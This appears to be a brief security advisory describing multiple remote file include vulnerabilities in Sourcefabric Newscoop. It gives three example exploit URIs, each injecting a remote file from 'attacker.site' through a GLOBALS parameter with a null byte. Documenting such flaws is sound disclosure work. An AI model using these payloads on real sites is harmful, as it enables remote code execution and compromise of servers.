Sourcefabric Newscoop Multiple Remote File Include Vulnerabilities

Sourcefabric Newscoop Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/include/phorum_load.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00
http://www.example.com/conf/install_conf.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00
http://www.example.com/conf/liveuser_configuration.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00